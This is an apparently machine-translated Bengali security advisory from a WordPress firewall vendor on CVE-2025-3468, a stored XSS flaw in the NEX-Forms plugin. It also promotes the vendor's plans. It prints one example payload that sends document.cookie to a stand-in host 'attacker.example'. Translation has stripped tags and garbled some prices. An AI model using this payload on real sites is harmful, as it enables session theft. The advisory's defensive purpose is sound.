CVE-2025-3468[NEX-Forms] সংরক্ষিত XSS এর বিপরীতে নিরাপদ ওয়ার্ডপ্রেস NEX Forms প্লাগইন

অ্যাডমিন

আপনার ওয়ার্ডপ্রেস সাইটকে NEX-Forms Authenticated Stored XSS Vulnerability (≤ 8.9.1) থেকে সুরক্ষিত রাখুন

৮ মে, ২০২৫ তারিখে, জনপ্রিয় "NEX-Forms – Ultimate Form Builder" প্লাগইন (সংস্করণ ≤ ৮.৯.১) -এ একটি নতুন দুর্বলতা প্রকাশ করা হয়েছিল। CVE-2025-3468 হিসাবে ট্র্যাক করা এই ত্রুটিটি অনুমোদিত ব্যবহারকারীদের ফর্ম ফিল্ডগুলিতে নির্বিচারে জাভাস্ক্রিপ্ট ইনজেক্ট করার অনুমতি দেয় যা সংরক্ষণ করা হয় এবং পরে যেকোনো দর্শনার্থীর কাছে রেন্ডার করা হয়। যদিও CVSS 6.5 স্কোরের সাথে LOW PRIORITY হিসাবে শ্রেণীবদ্ধ করা হয়েছে, সংরক্ষিত CROSS-SITE SCRIPTING (XSS) সেশন হাইজ্যাকিং, ক্ষতিকারক পুনর্নির্দেশ, ফিশিং ফর্ম এবং অবাঞ্ছিত বিজ্ঞাপনের দরজা খুলে দিতে পারে।

এই বিস্তারিত নির্দেশিকায় আমরা যা জানবো:

  • সংরক্ষিত XSS কী এবং কেন এটি গুরুত্বপূর্ণ তা ব্যাখ্যা করুন।
  • NEX-Forms দুর্বলতা কীভাবে কাজ করে তা দেখুন।
  • বাস্তব-বিশ্বের আক্রমণের পরিস্থিতি পরীক্ষা করুন
  • তাৎক্ষণিকভাবে প্রশমনের পদক্ষেপ গ্রহণ করুন
  • WP-Firewall কীভাবে আপনাকে স্বয়ংক্রিয়ভাবে সুরক্ষিত রাখে তা দেখান
  • দীর্ঘমেয়াদী শক্তকরণ এবং রক্ষণাবেক্ষণের সর্বোত্তম অনুশীলনের রূপরেখা তৈরি করুন

NEX-ফর্মগুলি প্রমাণীকৃত সঞ্চিত XSS দুর্বলতা বোঝা

প্লাগইন: নেক্স-ফর্মস - আলটিমেট ফর্ম বিল্ডার

প্রভাবিত সংস্করণ: ≤ ৮.৯.১

সংশোধন করা হয়েছে: 8.9.2

দুর্বলতার ধরণ: অনুমোদিত কাস্টম স্টোরেড ক্রস-সাইট স্ক্রিপ্টিং

প্রয়োজনীয় সুযোগ-সুবিধা: যেকোনো অনুমোদিত ব্যবহারকারী যিনি ফর্ম সম্পাদনা বা তৈরি করতে সক্ষম।

প্রকাশিত: ৮ মে, ২০২৫

মূলত, আপনার ওয়ার্ডপ্রেস সাইটে একটি বৈধ অ্যাকাউন্ট থাকা একজন আক্রমণকারী—যেমন একজন সম্পাদক বা সাবস্ক্রাইবার—একটি ফর্ম ক্ষেত্রের ভিতরে (উদাহরণস্বরূপ, একটি ফর্ম লেবেল বা একটি লুকানো ক্ষেত্র) একটি ক্ষতিকারক পেলোড তৈরি করতে পারে। যখন ফর্মটি সংরক্ষণ করা হয়, তখন প্লাগইনটি নির্দিষ্ট কিছু ইনপুট সঠিকভাবে স্যানিটাইজ করতে ব্যর্থ হয়। পরে, যখন কোনও দর্শনার্থী সামনের প্রান্তে সেই ফর্মটি দেখেন, তখন ইনজেক্ট করা স্ক্রিপ্টটি তাদের ব্রাউজার কনটেক্সটে কার্যকর হয়।

স্টোরড ক্রস-সাইট স্ক্রিপ্টিং কী?

ক্রস-সাইট স্ক্রিপ্টিং (XSS) হল দুর্বলতার একটি শ্রেণী যেখানে একজন আক্রমণকারী অন্য ব্যবহারকারীদের দ্বারা দেখা পৃষ্ঠাগুলিতে আক্রমণকারী-নিয়ন্ত্রিত HTML বা জাভাস্ক্রিপ্ট ইনজেক্ট করতে সক্ষম হয়। এর তিনটি প্রধান প্রকার রয়েছে:

  1. প্রতিফলিত XSS - একটি URL প্যারামিটারের মাধ্যমে ইনজেক্ট করা হয় এবং অবিলম্বে প্রতিফলিত হয়।
  2. DOM-ভিত্তিক XSS – যখন ক্লায়েন্ট-সাইড কোড অ-স্যানিটাইজড ইনপুটগুলির উপর ভিত্তি করে DOM পরিবর্তন করে তখন এটি ঘটে।
  3. সংরক্ষিত XSS - ক্ষতিকারক পেলোডগুলি সার্ভারে (যেমন, ডাটাবেস টেবিলে) সংরক্ষণ করা হয় এবং প্যাচ না করা পর্যন্ত প্রতিটি দর্শনার্থীকে পরিবেশন করা হয়।

কেন সঞ্চিত XSS বেশি বিপজ্জনক:

  • ATTACKER লগ আউট করার পরেও এটি টিকে থাকে।
  • প্রতিটি দর্শনার্থী (প্রশাসক, সম্পাদক, অথবা মন্তব্যকারী সহ) সম্ভাব্যভাবে প্রভাবিত হতে পারে।
  • আক্রমণকারীরা আরও জটিল, বহু-পদক্ষেপের আক্রমণ তৈরি করতে পারে, যেমন ফিশিং ফর্ম সরবরাহ করা বা শংসাপত্র ক্যাপচার করা।

NEX-ফর্মে এই দুর্বলতা কীভাবে কাজ করে

  1. ফর্ম তৈরি / সম্পাদনা:
    একজন অনুমোদিত ব্যবহারকারী ফর্ম বিল্ডার ইন্টারফেসটি খোলে। কিছু ইনপুট ক্ষেত্র - যেমন "কাস্টম HTML", "FIELD LABEL" বা "SUCCESS URL" - ফিল্টার আউট করে না। ট্যাগ বা ইভেন্ট হ্যান্ডলার।
  2. পে-লোড স্টোরেজ:
    ম্যালিসিয়াস কোডটি ওয়ার্ডপ্রেসের প্লাগইনের কাস্টম পোস্ট মেটা অথবা অপশন টেবিলে সংরক্ষিত থাকে।
  3. ফ্রন্ট-এন্ড রেন্ডারিং:
    যখন ফর্মটি কোনও পৃষ্ঠা বা পোস্টে প্রদর্শিত হয়, তখন প্লাগইনটি সরাসরি HTML-এ UNFILTERED কন্টেন্ট প্রতিধ্বনিত করে।
  4. স্ক্রিপ্ট এক্সিকিউশন:
    পৃষ্ঠাটি লোড করা যেকোনো ভিজিটর অজান্তেই ইনজেক্টেড জাভাস্ক্রিপ্টটি চালায়। এটি কুকিজ চুরি করতে পারে, ব্যবহারকারীকে পুনঃনির্দেশিত করতে পারে অথবা জাল লগইন ওভারলে প্রদর্শন করতে পারে।

আক্রমণকারীর উদাহরণ:

  
  
   
   আনুন ('https://attacker.example/steal?cookie='+document.cookie);

এই স্নিপেটটি, যদি কোনও ফর্ম লেবেলে অন্তর্ভুক্ত করা হয়, তাহলে একজন দর্শনার্থী ফর্মটি দেখার সাথে সাথেই এটি চালু হবে।

আপনার ওয়েবসাইটের উপর সম্ভাব্য প্রভাব

এমনকি "কম তীব্রতার" XSS সমস্যাও গুরুতর আপস ঘটাতে পারে:

  • সেশন হাইজ্যাকিং: আক্রমণকারীরা প্রমাণীকরণ কুকিজ কেড়ে নিতে পারে।
  • শংসাপত্র চুরি: জাল লগইন ফর্ম প্রশাসকের শংসাপত্র ফিশ করতে পারে।
  • ড্রাইভ-বাই ডাউনলোড: ব্যবহারকারীরা ম্যালওয়্যার ডাউনলোড করার জন্য প্রতারিত হতে পারেন।
  • বিকৃতি এবং ব্র্যান্ডের ক্ষতি: অবাঞ্ছিত বিজ্ঞাপন প্রবেশ করান বা পৃষ্ঠাগুলি বিকৃত করুন।
  • SEO জরিমানা: সার্চ ইঞ্জিনগুলি ক্ষতিকারক স্ক্রিপ্ট হোস্ট করা সাইটগুলিকে জরিমানা করে।

সময়ের সাথে সাথে, এই সমস্যাগুলি ভিজিটর ট্রাস্টকে দুর্বল করতে পারে, বিক্রয় হ্রাস করতে পারে এবং এমনকি আপনার সাইটকে কালো তালিকাভুক্ত করতে পারে।

শোষণের বাস্তব-বিশ্বের দৃশ্যপট

  1. ফিশিং অ্যাডমিন: সাবস্ক্রাইবার অ্যাক্সেস সহ একজন আক্রমণকারী একটি লুকানো আইফ্রেম এম্বেড করে যা একটি জাল অ্যাডমিন লগইন নির্দেশ করে। যখন একজন অ্যাডমিনিস্ট্রেটর ফ্রন্ট এন্ডে যান, তখন তাদের ফিশিং ফর্মটি পুনরায় প্রমাণীকরণ করতে বলা হয়।
  2. অ্যাফিলিয়েট জালিয়াতি: পার্টনার অফারগুলিতে রিডাইরেক্ট ইনজেক্ট করুন। প্রতিটি ক্লিক আক্রমণকারীর জন্য অ্যাফিলিয়েট রাজস্ব তৈরি করে।
  3. কৃমি-শৈলীর প্রচার: একটি আপোসপ্রাপ্ত অ্যাডমিন প্যানেল স্বয়ংক্রিয়ভাবে প্রতিটি নতুন ফর্মে ক্ষতিকারক পেলোড যোগ করে, যা দ্রুত সংক্রমণের পরিধি বৃদ্ধি করে।
  4. স্টিলথ ডেটা এক্সফিলট্রেশন: লুকানো স্ক্রিপ্টগুলি চুপচাপ ফর্ম জমা, মন্তব্য সামগ্রী বা কুকি ডেটা একটি বহিরাগত সার্ভারে পাঠায়।

প্রশমনের জন্য তাৎক্ষণিক পদক্ষেপ

  1. অবিলম্বে 8.9.2 বা তার পরবর্তী সংস্করণে আপডেট করুন।
    প্লাগইন লেখকরা 8.9.2 সংস্করণে স্যানিটেশন গ্যাপস নিয়ে আলোচনা করেছেন।
  2. বিদ্যমান অডিট ফর্ম: সমস্ত প্রকাশিত ফর্ম ব্রাউজ করুন।
    "কাস্টম HTML" এবং "LABEL" ক্ষেত্রগুলি পরীক্ষা করুন , অনলোড, অনক্লিক অথবা অনুরূপ।
    যেকোনো সন্দেহজনক এন্ট্রি সরিয়ে ফেলুন বা স্যানিটাইজ করুন।
  3. অবিশ্বাস্য অ্যাকাউন্টগুলি সরান:
    ফর্ম সম্পাদনা ক্ষমতা সহ যেকোনো অজানা বা অপ্রয়োজনীয় ব্যবহারকারীর অ্যাকাউন্ট অডিট করুন এবং সরিয়ে ফেলুন।
  4. অস্থায়ী ওয়াফ নিয়ম:
    যদি আপনার কাছে একটি ওয়েব অ্যাপ্লিকেশন ফায়ারওয়াল (WAF) সমাধান থাকে, তাহলে ব্লকে একটি কাস্টম নিয়ম স্থাপন করুন। ফর্ম মেটা ফিল্ডে ট্যাগ। এটি আপডেট করার সময় PAYLOAD-কে দর্শকদের কাছে পৌঁছাতে বাধা দেয়।

কেন একটি ওয়েব অ্যাপ্লিকেশন ফায়ারওয়াল গুরুত্বপূর্ণ

প্যাচিং অত্যন্ত গুরুত্বপূর্ণ, কিন্তু একটি ফায়ারওয়াল প্রতিরক্ষার একটি অতিরিক্ত স্তর প্রদান করে:

  • ভার্চুয়াল প্যাচিং: আপনি তাৎক্ষণিকভাবে আপডেট করতে না পারলেও, এক্সপ্লয়েট প্যাটার্নগুলি তাৎক্ষণিকভাবে ব্লক করুন।
  • শূন্য-দিন সুরক্ষা: বিপজ্জনক অনুরোধ স্বাক্ষর পর্যবেক্ষণ করে অজানা হুমকি ধরুন।
  • রেট লিমিটিং এবং আইপি নিয়ন্ত্রণ: থ্রোটল বা ব্লক সন্দেহজনক উৎস।
  • কেন্দ্রীভূত পর্যবেক্ষণ: আক্রমণের চেষ্টা হলে ড্যাশবোর্ড সতর্ক করে।

WAF আপডেটের বিকল্প নয়, তবে এটি আপনাকে জরুরি পরিস্থিতিতে সময় কিনে দেয়।

WP-ফায়ারওয়াল কীভাবে এই XSS দুর্বলতার বিরুদ্ধে সুরক্ষা দেয়

WP-Firewall-এ, আমরা ক্রমাগত নতুন প্রকাশিত WordPress দুর্বলতা বিশ্লেষণ করি এবং মিনিটের মধ্যে সুরক্ষামূলক নিয়ম প্রয়োগ করি। আমরা CVE-2025-3468 কীভাবে নিরপেক্ষ করি তা এখানে দেওয়া হল:

  1. অনুরোধ পরিদর্শন: সমস্ত আগত HTTP অনুরোধ লক্ষ্য করে ENDPOINTS ফর্ম সন্দেহজনক পেলোডের জন্য স্ক্যান করা হয়—যেমন, অবিশ্বাস্য ফর্ম ক্ষেত্রের ভিতরে ট্যাগ।
  2. ভার্চুয়াল প্যাচের নিয়ম: প্লাগইনের AJAX-এ স্ক্রিপ্ট ফ্র্যাগমেন্ট প্রবেশ করানোর চেষ্টা করে এমন যেকোনো অনুরোধ স্যানিটাইজ বা প্রত্যাখ্যান করার জন্য আমরা একটি ভার্চুয়াল প্যাচ স্থাপন করি অথবা রুটিন সংরক্ষণ করি।
  3. সতর্কতা এবং প্রতিবেদন: সাইটের মালিকরা অবরুদ্ধ শোষণ প্রচেষ্টার তাৎক্ষণিক বিজ্ঞপ্তি এবং লগ পান।
  4. কোনও পারফরম্যান্স হিট নেই: আমাদের লাইটওয়েট ওয়াফ মডিউলটি ন্যূনতম ল্যাটেন্সি নিশ্চিত করতে PHP স্তরে দক্ষতার সাথে কাজ করে।

WP-Firewall সক্ষম থাকলে, আপনি যদি এখনও NEX-Forms আপডেট না করে থাকেন, তবুও আপনার সাইটটি নিরাপদ থাকে।

আপনার ওয়ার্ডপ্রেস পরিবেশকে আরও শক্ত করা

প্লাগইন আপডেট এবং ফায়ারওয়াল নিয়মের বাইরে, এই সেরা অনুশীলনগুলি বিবেচনা করুন:

  • সর্বনিম্ন সুযোগ-সুবিধার নীতি: প্রতিটি ব্যবহারকারীর ভূমিকার জন্য কেবলমাত্র ন্যূনতম সুযোগ-সুবিধা প্রদান করুন।
  • টু-ফ্যাক্টর প্রমাণীকরণ (2FA): সমস্ত প্রশাসক এবং সম্পাদক অ্যাকাউন্টের জন্য 2FA প্রয়োগ করুন।
  • শক্তিশালী পাসওয়ার্ড নীতি: জটিল, অনন্য পাসওয়ার্ড প্রয়োজন; পাসওয়ার্ড ম্যানেজারগুলিকে একীভূত করুন।
  • ফাইল অনুমতি: আপনার সার্ভারে ফাইল এবং ডিরেক্টরি অনুমতি লক ডাউন করুন (যেমন, ফাইলের জন্য 644, ডিরেক্টরির জন্য 755)।
  • প্লাগইন / থিম এডিটর নিষ্ক্রিয় করুন: ড্যাশবোর্ড থেকে পিএইচপি ফাইল সম্পাদনা প্রতিরোধ করুন যোগ করে সংজ্ঞায়িত করুন ('DISALLOW_FILE_EDIT', সত্য); থেকে wp-config.php.
  • সুরক্ষিত কনফিগারেশন ফাইল: সরান wp-config.php একটি উচ্চতর ডিরেক্টরি এবং সীমাবদ্ধ অ্যাক্সেসের মাধ্যমে htaccess অথবা Nginx নিয়ম।

এই ব্যবস্থাগুলি কেবল XSS নয়, অনেক ধরণের আক্রমণকে প্রশমিত করে।

নিয়মিত রক্ষণাবেক্ষণ এবং আপডেট কৌশল

  1. ক্ষুদ্র প্রকাশের জন্য স্বয়ংক্রিয় আপডেট:
    সম্ভব হলে মাইনর ওয়ার্ডপ্রেস কোর এবং প্লাগইন ভার্সনের জন্য স্বয়ংক্রিয় আপডেট সক্ষম করুন।
  2. পরিবেশগত পরীক্ষা:
    প্রোডাকশনে যাওয়ার আগে কোনও স্ট্যাগিং সাইটের আপডেট পরীক্ষা করুন। অনাকাঙ্ক্ষিত পার্শ্ব প্রতিক্রিয়ার জন্য সামনের দিকের প্রদর্শনগুলি নিরীক্ষণ করতে এই পরিবেশটি ব্যবহার করুন।
  3. নির্ধারিত নিরাপত্তা নিরীক্ষা:
    পুরনো সফ্টওয়্যার, দুর্বল পাসওয়ার্ড এবং অনিরাপদ সেটিংস সনাক্ত করতে মাসিক ঝুঁকি স্ক্যান করুন।
  4. দুর্ঘটনার প্রতিক্রিয়া পরিকল্পনা:
    আপোষের ক্ষেত্রে সনাক্তকরণ, ধারণক্ষমতা, নির্মূল এবং পুনরুদ্ধারের জন্য নথিভুক্ত পদ্ধতি থাকতে হবে।

প্যাচিংয়ের বাইরে: ভার্চুয়াল প্যাচিং এবং অটো-আপডেট

  • ভার্চুয়াল প্যাচিং আপনাকে অফিসিয়াল প্যাচ আসার আগেই শোষণের বিরুদ্ধে রক্ষা করতে দেয়।
  • প্লাগইনগুলির জন্য স্বয়ংক্রিয়-আপডেট বৈশিষ্ট্যগুলি নিশ্চিত করে যে আপনি কখনই কোনও গুরুত্বপূর্ণ নিরাপত্তা প্রকাশ মিস করবেন না।

একসাথে, তারা একটি শক্তিশালী নিরাপত্তা জাল তৈরি করে যা এক্সপোজারের জানালাকে ব্যাপকভাবে ছোট করে।

WP-Firewall এর বিনামূল্যের পরিকল্পনার মাধ্যমে আপনার সাইটকে সুরক্ষিত রাখুন

আমাদের বেসিক (ফ্রি) প্ল্যান ব্যবহার করে আজই আপনার ওয়ার্ডপ্রেস সাইটকে সুরক্ষিত করা শুরু করুন। আপনি পাবেন:

  • রিয়েল-টাইম রিকোয়েস্ট ফিল্টারিং সহ পরিচালিত ফায়ারওয়াল
  • সীমাহীন ব্যান্ডউইথ এবং ট্র্যাফিক পরিদর্শন
  • OWASP এর বিরুদ্ধে সুরক্ষা XSS, SQL ইনজেকশন এবং CSRF সহ শীর্ষ ১০ ঝুঁকি
  • জ্ঞাত স্বাক্ষর সনাক্ত করার জন্য বিল্ট-ইন ম্যালওয়্যার স্ক্যানার

এখনই আপনার বিনামূল্যের পরিকল্পনা সক্রিয় করুন এবং আঙুল না তুলেই প্রয়োজনীয় সুরক্ষা উপভোগ করুন:
https://my.wp-firewall.com/buy/wp-firewall-free-plan/

আরও গভীর নিরাপত্তার জন্য স্ট্যান্ডার্ড এবং প্রো-তে স্থানান্তরিত হচ্ছে

যখন আপনি লেভেল আপ করার জন্য প্রস্তুত হবেন:

  • স্ট্যান্ডার্ড (১TP৪T৫০/বছর) স্বয়ংক্রিয় ম্যালওয়্যার অপসারণ এবং আইপি ব্ল্যাকলিস্ট/হোয়াইটলিস্ট (২০টি এন্ট্রি) যোগ করে।
  • PRO (১TP৪T২৯৯/বছর) মাসিক নিরাপত্তা প্রতিবেদন, অটো ভার্চুয়াল প্যাচিং এবং ডেডিকেটেড অ্যাকাউন্ট ম্যানেজার, নিরাপত্তা অপ্টিমাইজেশন এবং পরিচালিত পরিষেবার মতো প্রিমিয়াম অ্যাড-অন নিয়ে আসে।

প্রতিটি স্তর আপনার নিরাপত্তার চাহিদা মেটাতে এবং আপনাকে সম্পূর্ণ মানসিক প্রশান্তি দেওয়ার জন্য ডিজাইন করা হয়েছে।

উপসংহার

NEX-Forms প্লাগইন STORED XSS VULNERABILITY (CVE-2025-3468) একটি অনুস্মারক হিসেবে কাজ করে: এমনকি "কম" তীব্র ত্রুটিগুলিও গুরুতর আপসগুলির দরজা খুলে দিতে পারে। 8.9.2 (বা পরবর্তী) সংস্করণে আপডেট করে, বিদ্যমান ফর্মগুলি অডিট করে এবং WP-Firewall এর মতো একটি শক্তিশালী ওয়েব অ্যাপ্লিকেশন ফায়ারওয়াল ব্যবহার করে, আপনি কার্যকরভাবে ঝুঁকি দূর করেন।

মনে রাখবেন, নিরাপত্তা একটি অবিরাম যাত্রা। সফ্টওয়্যার আপডেট রাখুন, শক্তিশালী অ্যাক্সেস নিয়ন্ত্রণ প্রয়োগ করুন এবং স্বয়ংক্রিয় সরঞ্জাম ব্যবহার করুন যা আপনাকে ঘড়ির কাঁটার চারপাশে সুরক্ষিত রাখে। WP-Firewall আপনার সাইটকে সুরক্ষিত রাখার মাধ্যমে, আপনি লুকানো স্ক্রিপ্ট ইনজেকশন বা ড্রাইভ-বাই আক্রমণের বিষয়ে চিন্তা না করেই আকর্ষণীয় সামগ্রী তৈরি এবং আপনার শ্রোতা বৃদ্ধিতে মনোনিবেশ করতে পারেন।

নিরাপদে থাকো,

WP-ফায়ারওয়াল সিকিউরিটি টিম

wordpress security update banner

বিনামূল্যে WP নিরাপত্তা সাপ্তাহিক পান 👋
এখন সাইন আপ করুন!!

প্রতি সপ্তাহে আপনার ইনবক্সে ওয়ার্ডপ্রেস সিকিউরিটি আপডেট পেতে সাইন আপ করুন।

আমরা স্প্যাম করি না! আমাদের পড়ুন গোপনীয়তা নীতি আরও তথ্যের জন্য।

একটি প্রশংসামূলক ওয়ার্ডপ্রেস নিরাপত্তা পরামর্শ নির্ধারণ করতে আমাদের সাথে যোগাযোগ করুন

যোগাযোগ করুন

WP-ফায়ারওয়াল
6/F, The Rays, 71 Hung To Road, Kwun Tong, Kawloon, Hong Kong

বৈশিষ্ট্য মূল্য নির্ধারণ ব্লগ প্রবেশ করুন
গোপনীয়তা নীতি সেবা পাবার শর্ত ডক্স অধিভুক্ত
bn_BD বাংলা
bn_BD বাংলা en_US English zh_CN 简体中文 zh_HK 香港中文 zh_TW 繁體中文 ja 日本語 es_ES Español fr_FR Français ar العربية hi_IN हिन्दी ko_KR 한국어 it_IT Italiano pt_PT Português nl_NL Nederlands vi Tiếng Việt ru_RU Русский pl_PL Polski de_DE Deutsch da_DK Dansk

© 2025 WP-Firewall™